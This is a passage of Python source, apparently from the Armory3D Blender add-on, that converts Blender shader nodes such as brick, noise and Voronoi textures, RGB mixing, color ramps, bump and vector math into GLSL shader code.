return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
curshader.add_function(c_functions.str_tex_noise)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
# Slow..
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
if (t >= 12000):
rgb[0] = 0.826270103
rgb[1] = 0.994478524
rgb[2] = 1.56626022
elif (t < 965.0):
rgb[0] = 4.70366907
rgb[1] = 0.0
rgb[2] = 0.0
else:
if (t >= 6365.0):
i = 5
elif(t >= 3315.0):
i = 4
elif(t >= 1902.0):
i = 3
elif(t >= 1449.0):
i = 2
elif(t >= 1167.0):
i = 1
else:
i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
# ZYX rotation, Z axis for now..
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
# Pass throuh
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
